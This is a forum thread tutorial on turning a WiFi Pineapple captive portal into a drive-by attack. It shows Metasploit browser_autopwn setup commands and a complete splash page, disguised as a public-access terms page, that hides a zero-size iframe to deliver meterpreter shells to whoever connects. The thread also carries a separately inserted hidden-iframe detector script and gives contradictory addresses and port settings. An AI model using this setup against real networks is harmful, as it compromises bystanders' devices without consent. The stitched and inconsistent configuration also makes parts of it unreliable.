newbi3 Posted September 8, 2013

Running a captive portal is a very useful thing on the pineapple, and since everyone has to view it I thought, why not use it to run an attack and get a shell? So here is a quick tutorial on using evil portal to deliver a meterpreter shell. You will need a pineapple running v3.x of the firmware with evil portal installed on it, as well as metasploit and a machine to test this on.

Before we get started here I'd like to remind you to check the laws where you live; this could be illegal, and also I am not responsible for your actions, you and only you are. Please only do this in an environment that you have permission to do so in!

OK, so first things first, let's start up metasploit and use browser autopwn by running the following commands:

    root@box:~# msfconsole
    msf > use auxiliary/server/browser_autopwn

Now that that is done, let's go ahead and take a look at the options:

    msf auxiliary(browser_autopwn) > show options

    Module options (auxiliary/server/browser_autopwn):

       Name        Current Setting  Required  Description
       ----        ---------------  --------  -----------
       LHOST                        yes       The IP address to use for reverse-connect payloads
       SRVHOST     0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
       SRVPORT     8080             yes       The local port to listen on.
       SSL         false            no        Negotiate SSL for incoming connections
       SSLCert                      no        Path to a custom SSL certificate (default is randomly generated)
       SSLVersion  SSL3             no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
       URIPATH                      no        The URI to use for this exploit (default is random)

We need to set LHOST and SRVHOST to the address of our machine ON THE PINEAPPLE NETWORK. In my case it is 172.16.42.42, and if you ran the wp4.sh script yours should be too.
Also, just for less confusion, set SRVPORT to 80 and URIPATH to /

    msf auxiliary(browser_autopwn) > set LHOST 172.16.42.1
    LHOST => 172.16.42.1
    msf auxiliary(browser_autopwn) > set SRVPORT 172.16.42.1
    SRVPORT => 172.16.42.1
    msf auxiliary(browser_autopwn) > set SRVPORT 80
    SRVPORT => 80
    msf auxiliary(browser_autopwn) > set URIPATH /
    URIPATH => /

OK, now go ahead and run it with the "run" command. This will take a minute to start up fully. Once that has finished starting up, we need to create an iframe to it in our captive portal. Under the "Edit Splash" tab in Evil Portal, go ahead and add this line somewhere in the body and then save the file:

    <iframe src="http://172.16.42.42/" height="0px" width="0px" seamless></iframe>

This creates the iframe to the server running browser autopwn, which will be doing our dirty work for us. After you have saved the changes, open up a browser on your test machine (that is connected to the pineapple network) and visit any webpage, and you should get stopped by the captive portal! Check over in your metasploit console to see if you got any sessions. I am not going to hold your hand for this part because this is not a tutorial on how to use meterpreter.

I hope this works for you, and if you do anything cool, post it here. I'd love to see what the community does! Remember, hack responsibly!
Here is a quick video I made showing this in action:

If you are wanting to use my code for the captive portal, here it is:

    <html>
    <head>
      <title>Public Access Portal</title>
      <meta HTTP-EQUIV="Pragma" CONTENT="no-cache">
      <script type="text/javascript">
        var delay = 2; // length of delay in seconds
        var count = 0;
        var Texts = new Array();
        Texts[0] = '<p style="font-size:10px;"><u>Terms Of Service</u></p><p style="font-size:10px;">You agree that Public Access is not responsible for your actions on the internet or on this network.<br/>You agree that all of your communications will be monitored and recorded by Public Access</p>';
        Texts[1] = '<a href="$authtarget"><img src="$imagesdir/enter.png" width="71" height="49" border="0" alt="Click to enter" title="Click to enter"> </a>';

        function changeText() {
          document.getElementById('textRange').innerHTML = Texts[count];
          count++;
          if (count == Texts.length) {
            window.clearTimeout(to);
            count = 0;
          } else {
            var to = setTimeout("changeText()", delay * 10000);
          }
        }
      </script>
    </head>
    <body bgcolor="#DDDDDD" text="#000000" onload="changeText();">
      <table border="0" cellpadding="2" cellspacing="0" width="100%">
        <tr>
          <td align=center>
            <!--<h2>Public Access</h2>
            <h10><b><u>Providing fast wireless access to the masses.</u></b></h10>-->
          </td>
        </tr>
        <tr>
          <td align=center>
            <br/><br/><br/>
            <h1>You're almost there!</h1>
            <p>BY CONNECTING TO THE NETWORK YOU AGREE TO OUR TERMS OF SERVICE.</p>
          </td>
        </tr>
        <tr>
          <td align=center height="120">
            <!-- A client is authenticated by requesting the page $authtarget.
                 So, href to it here, with an img or link text the user can click on.
                 Also, note that any images you reference must reside in the
                 subdirectory that is the value of $imagesdir (default: "images"). -->
            <div id="textRange"></div>
          </td>
        </tr>
      </table>
      <iframe src="http://172.16.42.42/" height="0px" width="0px" seamless></iframe>
    </body>
    </html>
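
For anyone reviewing a splash page rather than building one, the tell in the post above is the zero-size iframe pointing at a second host. The following is an added example, not part of newbi3's post: it flags invisible frames in saved portal HTML. The function and class names, the list of hiding techniques checked, and the sample page are assumptions constructed for illustration.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

ZERO = re.compile(r"^\s*0+(\.0+)?\s*(px|%|em|pt)?\s*$", re.I)
HIDDEN_CSS = re.compile(
    r"display\s*:\s*none|visibility\s*:\s*hidden"
    r"|(?:width|height)\s*:\s*0+(?:px|%|em|pt)?\s*(?:;|$)", re.I)

class HiddenFrameFinder(HTMLParser):
    """Collects embedded-content tags that are rendered invisibly."""
    def __init__(self, page_host):
        super().__init__()
        self.page_host, self.findings = page_host, []

    def handle_starttag(self, tag, attrs):
        if tag not in ("iframe", "frame", "embed", "object"):
            return
        a = {k: (v or "") for k, v in attrs}
        # Zero width/height attributes, as in the splash page above.
        reasons = [f"{d}={a[d]!r}" for d in ("width", "height")
                   if ZERO.match(a.get(d, "x"))]
        if "hidden" in a:
            reasons.append("hidden attribute")
        if HIDDEN_CSS.search(a.get("style", "")):
            reasons.append("style hides element")
        if not reasons:
            return
        src = a.get("src") or a.get("data", "")
        host = urlparse(src).hostname  # None for relative URLs
        self.findings.append({
            "tag": tag, "src": src, "line": self.getpos()[0],
            "cross_host": host is not None and host != self.page_host,
            "reasons": reasons})

def find_hidden_frames(html, page_host):
    """Return one finding per invisible frame in a saved splash page."""
    finder = HiddenFrameFinder(page_host)
    finder.feed(html)
    finder.close()
    return finder.findings

# Constructed sample: a page served from 172.16.42.1 with one visible frame
# and one zero-size frame like the one in the post above.
SAMPLE = """<html><body>
<h1>You're almost there!</h1>
<iframe src="/terms.html" width="400" height="200"></iframe>
<iframe src="http://172.16.42.42/" height="0px" width="0px" seamless></iframe>
</body></html>"""

if __name__ == "__main__":
    for finding in find_hidden_frames(SAMPLE, "172.16.42.1"):
        print(finding)
```

A finding with `cross_host` set is the case worth a closer look: the portal is silently loading content from a machine other than the one serving the splash page.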

thesugarat Posted September 9, 2013

Thanks for your code! Now I need to figure out how to incorporate some logo pics.

newbi3 Posted September 9, 2013

Very simple, you can either put them in /etc/nodogsplash/images/ or in /www and reference it like <img src="http://172.16.42.1:8080/mylogo.png"/>

thesugarat Posted September 9, 2013

Ok, I'll give that a shot... Do they need to be .png format? And how would I safely comment out the iframe hook line? I don't want to delete it, but using the ## option before the line just gave me two pound symbols in my splash screen.

Foxtrot Posted September 9, 2013

If it's in the PHP code, use //; if it's in HTML, add a <!-- in front of the code and a --> at the end of the code.

newbi3 Posted September 10, 2013

I haven't researched it too much yet, but I am pretty sure the nodogsplash web server doesn't support PHP, so you will only be writing HTML, CSS, and JavaScript.

thesugarat Posted September 11, 2013

Thanks to both of you. It looked like HTML but I am not a code monkey. :)

BobH Posted June 11, 2014

Can you post a link to the video? For some reason it no longer appears for me inline.

Swamppifi Posted June 13, 2014

BobH, you can find it on newbi3's YouTube channel; the link is in his post signature. But the link to the video covering this post's topic is at http://www.youtube.com/watch?v=gOQoOCinGKQ